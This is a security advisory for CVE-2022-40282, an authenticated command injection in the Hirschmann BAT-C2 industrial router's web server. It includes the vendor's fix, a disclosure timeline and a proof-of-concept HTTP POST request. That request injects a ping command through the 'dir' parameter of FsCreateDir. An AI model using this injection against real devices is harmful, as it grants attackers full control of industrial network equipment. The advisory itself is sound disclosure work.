Hirschmann (Belden) BAT-C2 8.8.1.0R8 Command Injection

CyberDanube Security Research 20221124-0-------------------------------------------------------------------------------                title| Authenticated Command Injection              product| Hirschmann (Belden) BAT-C2   vulnerable version| 8.8.1.0R8        fixed version| 09.13.01.00R04           CVE number| CVE-2022-40282               impact| High             homepage| https://hirschmann.com/                     | https://beldensolutions.com                found| 2022-08-01                   by| T. Weber (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"The Technology and Market Leader in Industrial Networking. Hirschmann™develops innovative solutions, which are geared towards its customers’requirements in terms of performance, efficiency and investmentreliability."Source: https://beldensolutions.com/en/Company/About_Us/belden_brands/index.phtmlVulnerable versions-------------------------------------------------------------------------------Hirschmann BAT-C2 / 8.8.1.0R8Vulnerability overview-------------------------------------------------------------------------------1) Authenticated Command InjectionThe web server of the device is prone to an authenticated command injection.It allows an attacker to gain full access to the underlying operating system ofthe device with all implications. If such a device is acting as key device inan industrial network, or controls various critical equipment via serial ports,more extensive damage in the corresponding network can be done by an attacker.Proof of Concept-------------------------------------------------------------------------------1) Authenticated Command InjectionThe command "ping 192.168.1.1" was injected to the system by using thefollowing POST request:===============================================================================POST / HTTP/1.1Host: 192.168.3.150User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 75Origin: https://192.168.3.150Authorization: Digest username="admin", realm="config", nonce="4b63bb796252d310", uri="/", algorithm=MD5, response="dbcf03216bd8fbaa15f4b9d9d0fc1d43", qop=auth, nc=0000000a, cnonce="99c14d39557e691d"Referer: https://192.168.3.150/Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeajax=FsCreateDir&dir='%3Bping%20192.168.1.1%3B'&iehack=&submit=Create&cwd=/=============================================================================== The vulnerability was manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution-------------------------------------------------------------------------------Upgrade to firmware version 09.13.01.00R04 or above.A security bulletin for this vulnerability has been published by the vendor:https://www.belden.com/dfsmedia/f1e38517e0cd4caa8b1acb6619890f5e/15088-source/Workaround-------------------------------------------------------------------------------NoneRecommendation-------------------------------------------------------------------------------CyberDanube recommends customers from Hirschmann to upgrade the firmware to thelatest version available. Furthermore, a full security review by professionalsis recommended.Contact Timeline-------------------------------------------------------------------------------2022-08-03: Contacting Hirschmann via [email protected]; Belden contact             suspects a duplicate. Asked contact for more information.2022-08-18: Belden representative sent more information for clarification.             Highlighted differences between PoCs.2022-08-22: Belden contact confirmed the vulnerability to be no duplicate.2022-08-30: Asked for an update.2022-08-31: Vendor stated, that he will release another security bulletin for             this vulnerability.2022-09-27: Asked for an update.2022-09-28: Vendor is currently testing the new firmware version and has also             been assigned with an CVE number. Draft of security bulletin was             also sent by the security contact.2022-10-12: Asked for an update.2022-10-13: Belden contact stated, that there is no publication date for now as             another patch must be integrated.2022-10-28: Security contact informed us, that the patch will be released             within the next two weeks.2022-11-22: Asked for a status update; Security contact stated, that the             release was delayed due internal reasons.2022-11-23: Vendor sent the final version of the security bulletins. The             release of the new firmware version will be 2022-11-28.2022-11-24: Vendor informed CyberDanube that the release of the bulletin and             the firmware was done on 2022-11-23 by the marketing team.             Coordinated release of security advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF T. Weber / @2022